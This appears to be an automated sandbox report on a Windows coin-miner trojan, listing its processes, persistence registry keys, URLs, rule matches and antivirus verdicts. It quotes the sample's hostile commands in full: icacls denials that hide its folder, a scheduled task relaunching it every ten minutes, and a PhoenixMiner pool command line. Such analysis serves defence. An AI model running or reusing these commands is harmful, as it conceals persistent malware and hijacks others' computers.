Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 9, 2021, 4:25 p.m. | March 9, 2021, 4:27 p.m. |
-
-
cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)"
1568-
icacls.exe icacls C:\ProgramData\NetWork /deny "test22:(R,REA,RA)"
1976
-
-
-
icacls.exe icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)"
2260
-
-
cmd.exe C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
1460-
icacls.exe icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))"
2232
-
-
cmd.exe C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10
1080-
schtasks.exe schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10
1828
-
-
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
cmdline | schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10 |
cmdline | C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10 |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))" |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)" |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)" |
section | {u'size_of_data': u'0x00019000', u'virtual_address': u'0x000c8000', u'entropy': 7.307910374133275, u'name': u'.rsrc', u'virtual_size': u'0x00018e6c'} | entropy | 7.30791037413 | description | A section with a high entropy has been found |
url | https://ssl.pstatic.net/tveta/libs/1287/1287046/6df1cc02334922baa2d4_20200806172035021.jpg |
url | https://ssl.pstatic.net/static/pwe/common/img_use_mobile_version.png |
url | https://fonts.gstatic.com/s/lato/v16/S6uyw4BMUTPHjx4wWA.woff |
url | http://google.com/ |
url | https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38528621599152653.jpeg%22 |
url | https://s.pstatic.net/static/www/mobile/edit/2020/0804/cropImg_728x360_38481254551659019.jpeg |
url | https://ssl.pstatic.net/tveta/libs/assets/js/common/min/probe.min.js |
url | https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic1.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0806%2FcropImg_222x145_38626953912837677.png%22 |
url | https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct |
url | http://search.naver.com/search.naver?sm=tab_hty.top |
url | http://www.snee.com/xml/xslt/sample.doc |
url | http://www.yceml.net/0559/10408495-1499411010011 |
url | https://s.pstatic.net/static/www/mobile/edit/2018/0206/cropImg_166x108_118371466370743504.jpeg |
url | https://s.pstatic.net/static/newsstand/up/2020/0615/nsd10319824.png |
url | https://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjd5a7dvQ.woff |
url | https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38552809772500435.jpeg%22 |
url | https://t1.daumcdn.net/tistory_admin/blogs/plugins/tatterDesk/js/src/controls.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336 |
url | https://ssl.pstatic.net/static/pwe/nm/b.gif |
url | https://castbox.shopping.naver.com/js/lazyload.js |
url | https://s.pstatic.net/shopping.phinf/20200729_1/2931dd60-1842-4048-a39c-1e3389db4a0e.jpg |
url | https://ssl.pstatic.net/static/pwe/nm/spr_vertical_0d25bb77f8.png |
url | https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2Fmobile_17061525298c.jpg%22 |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/042.png |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/955.png |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/056.png |
url | http://www.buzzadnetwork.com/jump/next.php?stamat=m%7CM-4iM-4jaQdHQBH0dEdHP3xP.0e7%2CboDB7XrVJDfRqYwVNhmAc8QRCrIuseXl_bWuTf_latOFYiGEzPpb7ikp5t8RPmTHyMRYDe1i9EJZLC6LSuccW1-YPggnMxkcwVirdNVGfgK3hFUbeKvFvqNv0-u8VxfrNUFB1gFhMN_8GLCn1znxf5_p0FJe0MYRI7nbfyajoqg_H3fvzrjsMsC0vAMYn2un8v5vcBfzwM-DewoZ7WId7geGlrySfAHx5KiJ5Hm90CU%2C |
url | https://s.pstatic.net/shopping.phinf/20200720_22/e2297359-375a-403a-86c5-44ff86c708fc.jpg |
url | https://t1.daumcdn.net/tistory_admin/blogs/plugins/PreventCopyContents/js/functions.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336 |
url | https://ssl.pstatic.net/tveta/libs/1298/1298853/743c01d46e807a376d99_20200730182507675.png |
url | https://tistory3.daumcdn.net/tistory/807805/skin/images/footerbg.jpg |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/820.png |
url | https://file-examples-com.github.io/uploads/2017/02/file-sample_1MB.doc |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/825.png |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/327.png |
url | https://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjc5a7dvQ.woff |
url | http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab |
url | https://mail.naver.com/js_src/com/nhncorp/mail/write/se2_new/smart_editor2_inputarea_ie8.html?version=20190704 |
url | https://static.nid.naver.com/loginv3/img/sp_login_20150113.gif |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/031.png |
url | https://tpc.googlesyndication.com/pagead/images/abg/icon.png |
url | https://search.pstatic.net/common/?src=http%3A%2F%2Fcafefiles.naver.net%2FMjAxNzExMDdfODcg%2FMDAxNTEwMDY0OTYzNTA5.y-bJj3BgRC8r80hM6EblWFHSqawqo5-vMJAzHBN6rEkg.vAPtUzoeY8mHPRaMuejD3HrMtW5xgv-cdeEaAc0q2Rog.PNG.flashcs7%2FScreenshot_2017-11-07-22-55-08.png%23600x1024 |
url | https://www.gstatic.com/m/images/sy_stars_9.gif |
url | https://t1.daumcdn.net/tistory_admin/blogs/plugins/tatterDesk/js/src/dragdrop.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336 |
url | https://phinf.pstatic.net/contact/20190113_166/1547312816315t3o9l_JPEG/image.JPEG?type=s80 |
url | https://www.naver.com |
url | https://t1.daumcdn.net/tistory_admin/blogs/style/menubar.css?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336 |
url | https://tpc.googlesyndication.com/pagead/js/r20180205/r20110914/abg.js |
url | https://s.pstatic.net/static/newsstand/2020/logo/light/0604/024.png |
url | https://c.microsoft.com/ms.js |
url | https://s.pstatic.net/shopping.phinf/20200806_26/3cad46ab-3fa4-4756-9e01-d61372890bd0.jpg |
description | Code injection with CreateRemoteThread in a remote process | rule | inject_thread | ||||||
description | Create a windows service | rule | create_service | ||||||
description | Create a COM server | rule | create_com_service | ||||||
description | Communications over UDP network | rule | network_udp_sock | ||||||
description | Listen for incoming communication | rule | network_tcp_listen | ||||||
description | Communications over P2P network | rule | network_p2p_win | ||||||
description | Communications over HTTP | rule | network_http | ||||||
description | File downloader/dropper | rule | network_dropper | ||||||
description | Communications over FTP | rule | network_ftp | ||||||
description | Communications over RAW socket | rule | network_tcp_socket | ||||||
description | Communications use DNS | rule | network_dns | ||||||
description | Communication using dga | rule | network_dga | ||||||
description | Escalade priviledges | rule | escalate_priv | ||||||
description | Take screenshot | rule | screenshot | ||||||
description | Run a keylogger | rule | keylogger | ||||||
description | Steal credential | rule | cred_local | ||||||
description | Record Audio | rule | sniff_audio | ||||||
description | APC queue tasks migration | rule | migrate_apc | ||||||
description | Malware can spread east-west file | rule | spreading_file | ||||||
description | Malware can spread east-west using share drive | rule | spreading_share | ||||||
description | Create or check mutex | rule | win_mutex | ||||||
description | Affect system registries | rule | win_registry | ||||||
description | Affect system token | rule | win_token | ||||||
description | Affect private profile | rule | win_private_profile | ||||||
description | Affect private profile | rule | win_files_operation | ||||||
description | Match Winsock 2 API library declaration | rule | Str_Win32_Winsock2_Library | ||||||
description | Match Windows Inet API library declaration | rule | Str_Win32_Wininet_Library | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | inject_thread | ||||||
description | Create a windows service | rule | create_service | ||||||
description | Communications over UDP network | rule | network_udp_sock | ||||||
description | Listen for incoming communication | rule | network_tcp_listen | ||||||
description | Communications over P2P network | rule | network_p2p_win | ||||||
description | Communications over HTTP | rule | network_http | ||||||
description | File downloader/dropper | rule | network_dropper |
cmdline | schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10 |
cmdline | C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10 |
host | 194.147.115.117 |
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Win32 SystemNetwork Application | reg_value | C:\ProgramData\NetWork\This.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application | reg_value | C:\ProgramData\NetWork\This.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application | reg_value | C:\ProgramData\NetWork\This.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application | reg_value | C:\ProgramData\NetWork\This.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application | reg_value | C:\ProgramData\NetWork\This.exe | ||||||
cmdline | schtasks /create /tn "SrartupWindows" /tr "C:\ProgramData\NetWork\This.exe" /sc minute /mo 10 | ||||||||
cmdline | C:\Windows\system32\cmd.exe /cschtasks /create /tn "SrartupWindows" /tr "%ProgramData%\NetWork\This.exe" /sc minute /mo 10 |
cmdline | C:\ProgramData\NetWork\PhoenixMiner.exe -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.h -gpow 30 -gt 6 -log 0 |
cmdline | icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)" |
cmdline | icacls C:\ProgramData\NetWork /deny "test22:(R,REA,RA)" |
cmdline | icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))" |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Administrators:(R,REA,RA))" |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "Users:(R,REA,RA)" |
cmdline | C:\Windows\system32\cmd.exe /c icacls C:\ProgramData\NetWork /deny "%username%:(R,REA,RA)" |
dead_host | 194.147.115.117:80 |
Bkav | W32.AIDetect.malware2 |
MicroWorld-eScan | Trojan.GenericKD.35338298 |
FireEye | Generic.mg.c49dd8107b3624f8 |
McAfee | Artemis!C49DD8107B36 |
Cylance | Unsafe |
Sangfor | Trojan.Win32.Save.a |
CrowdStrike | win/malicious_confidence_100% (W) |
Alibaba | Trojan:Win32/Miner.b6b763bb |
K7GW | Riskware ( 0040eff71 ) |
K7AntiVirus | Riskware ( 0040eff71 ) |
Arcabit | Trojan.Generic.D21B383A |
Cyren | W32/Trojan.YYEL-5697 |
Symantec | Trojan.Gen.MBT |
TrendMicro-HouseCall | TROJ_GEN.R057C0PKC20 |
Avast | Win32:Malware-gen |
Kaspersky | Trojan.Win32.Miner.asymo |
BitDefender | Trojan.GenericKD.35338298 |
NANO-Antivirus | Trojan.Win32.Miner.ibscgf |
Paloalto | generic.ml |
AegisLab | Hacktool.Win32.Gamehack.3!e |
Tencent | Win32.Trojan.Miner.Syhx |
Ad-Aware | Trojan.GenericKD.35338298 |
Sophos | Mal/Generic-S |
Comodo | Malware@#6chz4oapf33y |
F-Secure | Heuristic.HEUR/AGEN.1100129 |
DrWeb | Trojan.Siggen10.62280 |
VIPRE | Trojan.Win32.Generic!BT |
TrendMicro | TROJ_GEN.R057C0PKC20 |
McAfee-GW-Edition | BehavesLike.Win32.TrojanAitInject.dh |
Emsisoft | Trojan.CoinMiner (A) |
APEX | Malicious |
MaxSecure | Trojan.Malware.300983.susgen |
Avira | HEUR/AGEN.1100129 |
MAX | malware (ai score=100) |
Gridinsoft | Trojan.Win32.CoinMiner.vb |
Microsoft | Trojan:Win32/CoinMiner.AC!rfn |
ZoneAlarm | Trojan.Win32.Miner.asymo |
GData | Trojan.GenericKD.35338298 |
Cynet | Malicious (score: 85) |
AhnLab-V3 | Malware/Win32.Generic.C4224711 |
VBA32 | Trojan.Miner |
ALYac | Trojan.GenericKD.35338298 |
Malwarebytes | Generic.Malware/Suspicious |
Ikarus | Trojan.Win32.CoinMiner |
ESET-NOD32 | a variant of Win32/CoinMiner.CFE |
eGambit | Unsafe.AI_Score_94% |
Fortinet | AutoIt/Agent.OUJ!tr.dldr |
Webroot | W32.Trojan.Gen |
AVG | Win32:Malware-gen |
Cybereason | malicious.07b362 |